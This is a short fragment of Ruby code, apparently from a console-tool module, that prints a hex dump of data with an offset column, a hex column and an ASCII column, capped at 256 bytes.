      ascii_part = chunk.map { |b| (b >= 32 && b < 127) ? b.chr : '.' }.join

      # Pad hex part if less than 16 bytes
      hex_part = hex_part.ljust(47)

      print_line(" #{('%04x' % offset)} #{hex_part} |#{ascii_part}|")
      offset += 16

      # Limit output to avoid flooding console
      break if offset >= 256
    end
    print_line(' ...') if data.length > 256
  end
end